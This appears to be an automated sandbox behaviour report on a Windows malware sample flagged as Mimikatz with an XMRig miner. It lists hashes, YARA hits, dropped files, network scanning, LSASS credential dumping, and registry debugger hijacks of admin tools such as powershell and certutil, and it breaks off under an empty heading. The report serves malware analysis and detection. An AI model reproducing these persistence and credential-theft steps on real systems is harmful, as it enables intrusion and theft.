Analysis
-
max time kernel
128s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
31-10-2024 04:44
Behavioral task
behavioral1
Sample
2024-10-31_f2060510bd803ebbcab2c7f12c1caeee_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-10-31_f2060510bd803ebbcab2c7f12c1caeee_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-10-31_f2060510bd803ebbcab2c7f12c1caeee_hacktools_icedid_mimikatz.exe
-
Size
14.0MB
-
MD5
f2060510bd803ebbcab2c7f12c1caeee
-
SHA1
a0c50af6efd1f632cc5d6dc4d0e1d867ba01d13c
-
SHA256
184c5ba83ac8f8506b5e3b970db7dd6e52cb78460d6047fb7732f3879eb8b0a1
-
SHA512
06a97899c1f41ec51d976b0bd4d0be62635b30f97920c893327280967dcddc7cba2c387ed203987b92548f9cab4eb6e9e1b7a316bb8b4eb1438b81bb899b13c4
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
pngsbwu.exedescription pid Process procid_target PID 960 created 2084 960 pngsbwu.exe 38 -
Xmrig family
-
Contacts a large (25065) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 11 IoCs
Processes:
resource yara_rule behavioral2/memory/4852-178-0x00007FF7D4F00000-0x00007FF7D5020000-memory.dmp xmrig behavioral2/memory/4852-182-0x00007FF7D4F00000-0x00007FF7D5020000-memory.dmp xmrig behavioral2/memory/4852-199-0x00007FF7D4F00000-0x00007FF7D5020000-memory.dmp xmrig behavioral2/memory/4852-212-0x00007FF7D4F00000-0x00007FF7D5020000-memory.dmp xmrig behavioral2/memory/4852-221-0x00007FF7D4F00000-0x00007FF7D5020000-memory.dmp xmrig behavioral2/memory/4852-236-0x00007FF7D4F00000-0x00007FF7D5020000-memory.dmp xmrig behavioral2/memory/4852-249-0x00007FF7D4F00000-0x00007FF7D5020000-memory.dmp xmrig behavioral2/memory/4852-257-0x00007FF7D4F00000-0x00007FF7D5020000-memory.dmp xmrig behavioral2/memory/4852-266-0x00007FF7D4F00000-0x00007FF7D5020000-memory.dmp xmrig behavioral2/memory/4852-375-0x00007FF7D4F00000-0x00007FF7D5020000-memory.dmp xmrig behavioral2/memory/4852-376-0x00007FF7D4F00000-0x00007FF7D5020000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
Processes:
resource yara_rule behavioral2/memory/3488-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/3488-4-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/files/0x0008000000023bcc-6.dat mimikatz behavioral2/memory/3708-8-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/4352-138-0x00007FF60C450000-0x00007FF60C53E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
pngsbwu.exewpcap.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts pngsbwu.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts pngsbwu.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
Processes:
pngsbwu.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pngsbwu.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid Process 2196 netsh.exe 1576 netsh.exe -
Executes dropped EXE 28 IoCs
Processes:
pngsbwu.exepngsbwu.exewpcap.exeegujfrlin.exevfshost.exeiaifetitb.exexohudmc.exepujbqc.exeibjntt.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exepngsbwu.exeiaifetitb.exeiaifetitb.exelbsulqbbe.exepid Process 3708 pngsbwu.exe 960 pngsbwu.exe 4000 wpcap.exe 4452 egujfrlin.exe 4352 vfshost.exe 4304 iaifetitb.exe 2996 xohudmc.exe 4632 pujbqc.exe 4852 ibjntt.exe 3096 iaifetitb.exe 972 iaifetitb.exe 4084 iaifetitb.exe 4964 iaifetitb.exe 880 iaifetitb.exe 4924 iaifetitb.exe 640 iaifetitb.exe 2748 iaifetitb.exe 4904 iaifetitb.exe 4404 iaifetitb.exe 2384 iaifetitb.exe 4524 iaifetitb.exe 4756 iaifetitb.exe 1988 iaifetitb.exe 1036 iaifetitb.exe 3748 pngsbwu.exe 4228 iaifetitb.exe 3240 iaifetitb.exe 748 lbsulqbbe.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exeegujfrlin.exepid Process 4000 wpcap.exe 4000 wpcap.exe 4000 wpcap.exe 4000 wpcap.exe 4000 wpcap.exe 4000 wpcap.exe 4000 wpcap.exe 4000 wpcap.exe 4000 wpcap.exe 4452 egujfrlin.exe 4452 egujfrlin.exe 4452 egujfrlin.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 78 ifconfig.me 79 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
pngsbwu.exewpcap.exexohudmc.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft pngsbwu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF pngsbwu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF pngsbwu.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\pujbqc.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\pujbqc.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE pngsbwu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies pngsbwu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData pngsbwu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content pngsbwu.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 pngsbwu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 pngsbwu.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 pngsbwu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache pngsbwu.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe -
Processes:
resource yara_rule behavioral2/files/0x0007000000023ca8-134.dat upx behavioral2/memory/4352-135-0x00007FF60C450000-0x00007FF60C53E000-memory.dmp upx behavioral2/memory/4352-138-0x00007FF60C450000-0x00007FF60C53E000-memory.dmp upx behavioral2/files/0x0007000000023cb2-141.dat upx behavioral2/memory/4304-142-0x00007FF7E32C0000-0x00007FF7E331B000-memory.dmp upx behavioral2/memory/4304-160-0x00007FF7E32C0000-0x00007FF7E331B000-memory.dmp upx behavioral2/files/0x0007000000023cb0-164.dat upx behavioral2/memory/4852-165-0x00007FF7D4F00000-0x00007FF7D5020000-memory.dmp upx behavioral2/memory/3096-171-0x00007FF7E32C0000-0x00007FF7E331B000-memory.dmp upx behavioral2/memory/972-175-0x00007FF7E32C0000-0x00007FF7E331B000-memory.dmp upx behavioral2/memory/4852-178-0x00007FF7D4F00000-0x00007FF7D5020000-memory.dmp upx behavioral2/memory/4084-180-0x00007FF7E32C0000-0x00007FF7E331B000-memory.dmp upx behavioral2/memory/4852-182-0x00007FF7D4F00000-0x00007FF7D5020000-memory.dmp upx behavioral2/memory/4964-185-0x00007FF7E32C0000-0x00007FF7E331B000-memory.dmp upx behavioral2/memory/880-189-0x00007FF7E32C0000-0x00007FF7E331B000-memory.dmp upx behavioral2/memory/4924-193-0x00007FF7E32C0000-0x00007FF7E331B000-memory.dmp upx behavioral2/memory/640-197-0x00007FF7E32C0000-0x00007FF7E331B000-memory.dmp upx behavioral2/memory/4852-199-0x00007FF7D4F00000-0x00007FF7D5020000-memory.dmp upx behavioral2/memory/2748-202-0x00007FF7E32C0000-0x00007FF7E331B000-memory.dmp upx behavioral2/memory/4904-206-0x00007FF7E32C0000-0x00007FF7E331B000-memory.dmp upx behavioral2/memory/4404-210-0x00007FF7E32C0000-0x00007FF7E331B000-memory.dmp upx behavioral2/memory/4852-212-0x00007FF7D4F00000-0x00007FF7D5020000-memory.dmp upx behavioral2/memory/2384-215-0x00007FF7E32C0000-0x00007FF7E331B000-memory.dmp upx behavioral2/memory/4524-219-0x00007FF7E32C0000-0x00007FF7E331B000-memory.dmp upx behavioral2/memory/4852-221-0x00007FF7D4F00000-0x00007FF7D5020000-memory.dmp upx behavioral2/memory/4756-224-0x00007FF7E32C0000-0x00007FF7E331B000-memory.dmp upx behavioral2/memory/1988-228-0x00007FF7E32C0000-0x00007FF7E331B000-memory.dmp upx behavioral2/memory/1036-231-0x00007FF7E32C0000-0x00007FF7E331B000-memory.dmp upx behavioral2/memory/4228-235-0x00007FF7E32C0000-0x00007FF7E331B000-memory.dmp upx behavioral2/memory/4852-236-0x00007FF7D4F00000-0x00007FF7D5020000-memory.dmp upx behavioral2/memory/3240-238-0x00007FF7E32C0000-0x00007FF7E331B000-memory.dmp upx behavioral2/memory/4852-249-0x00007FF7D4F00000-0x00007FF7D5020000-memory.dmp upx behavioral2/memory/4852-257-0x00007FF7D4F00000-0x00007FF7D5020000-memory.dmp upx behavioral2/memory/4852-266-0x00007FF7D4F00000-0x00007FF7D5020000-memory.dmp upx behavioral2/memory/4852-375-0x00007FF7D4F00000-0x00007FF7D5020000-memory.dmp upx behavioral2/memory/4852-376-0x00007FF7D4F00000-0x00007FF7D5020000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
pngsbwu.exelbsulqbbe.exe2024-10-31_f2060510bd803ebbcab2c7f12c1caeee_hacktools_icedid_mimikatz.execmd.exedescription ioc Process File created C:\Windows\bfeilulnt\UnattendGC\specials\trfo-2.dll pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\specials\docmicfg.exe pngsbwu.exe File opened for modification C:\Windows\taptlsnb\docmicfg.xml pngsbwu.exe File created C:\Windows\bfeilulnt\pvqslbkgq\egujfrlin.exe pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\specials\docmicfg.xml pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\specials\spoolsrv.exe pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\specials\libeay32.dll pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\specials\svschost.xml pngsbwu.exe File opened for modification C:\Windows\bfeilulnt\pvqslbkgq\Result.txt lbsulqbbe.exe File created C:\Windows\bfeilulnt\UnattendGC\specials\coli-0.dll pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\specials\libxml2.dll pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\specials\ssleay32.dll pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\specials\zlib1.dll pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\specials\schoedcl.xml pngsbwu.exe File created C:\Windows\taptlsnb\svschost.xml pngsbwu.exe File created C:\Windows\bfeilulnt\pvqslbkgq\ip.txt pngsbwu.exe File created C:\Windows\taptlsnb\pngsbwu.exe 2024-10-31_f2060510bd803ebbcab2c7f12c1caeee_hacktools_icedid_mimikatz.exe File created C:\Windows\bfeilulnt\UnattendGC\specials\schoedcl.exe pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\specials\tibe-2.dll pngsbwu.exe File created C:\Windows\taptlsnb\spoolsrv.xml pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\specials\posh-0.dll pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\svschost.xml pngsbwu.exe File created C:\Windows\bfeilulnt\pvqslbkgq\wpcap.exe pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\AppCapture64.dll pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\vimpcsvc.xml pngsbwu.exe File created C:\Windows\bfeilulnt\pvqslbkgq\lbsulqbbe.exe pngsbwu.exe File created C:\Windows\taptlsnb\vimpcsvc.xml pngsbwu.exe File opened for modification C:\Windows\taptlsnb\svschost.xml pngsbwu.exe File created C:\Windows\bfeilulnt\pvqslbkgq\Packet.dll pngsbwu.exe File opened for modification C:\Windows\taptlsnb\spoolsrv.xml pngsbwu.exe File created C:\Windows\ime\pngsbwu.exe pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\specials\xdvl-0.dll pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\specials\ucl.dll pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\specials\svschost.exe pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\spoolsrv.xml pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\specials\crli-0.dll pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\specials\cnli-1.dll pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\specials\trch-1.dll pngsbwu.exe File opened for modification C:\Windows\taptlsnb\schoedcl.xml pngsbwu.exe File created C:\Windows\bfeilulnt\Corporate\vfshost.exe pngsbwu.exe File created C:\Windows\bfeilulnt\pvqslbkgq\wpcap.dll pngsbwu.exe File opened for modification C:\Windows\taptlsnb\vimpcsvc.xml pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\specials\vimpcsvc.exe pngsbwu.exe File created C:\Windows\bfeilulnt\upbdrjv\swrpwe.exe pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\specials\tucl-1.dll pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\schoedcl.xml pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\specials\spoolsrv.xml pngsbwu.exe File created C:\Windows\taptlsnb\docmicfg.xml pngsbwu.exe File created C:\Windows\bfeilulnt\pvqslbkgq\scan.bat pngsbwu.exe File opened for modification C:\Windows\bfeilulnt\pvqslbkgq\Packet.dll pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\specials\exma-1.dll pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\docmicfg.xml pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\specials\vimpcsvc.xml pngsbwu.exe File created C:\Windows\taptlsnb\schoedcl.xml pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\Shellcode.ini pngsbwu.exe File created C:\Windows\bfeilulnt\UnattendGC\AppCapture32.dll pngsbwu.exe File created C:\Windows\bfeilulnt\Corporate\mimidrv.sys pngsbwu.exe File opened for modification C:\Windows\taptlsnb\pngsbwu.exe 2024-10-31_f2060510bd803ebbcab2c7f12c1caeee_hacktools_icedid_mimikatz.exe File opened for modification C:\Windows\bfeilulnt\Corporate\log.txt cmd.exe File created C:\Windows\bfeilulnt\Corporate\mimilib.dll pngsbwu.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid Process 4924 sc.exe 400 sc.exe 756 sc.exe 2792 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
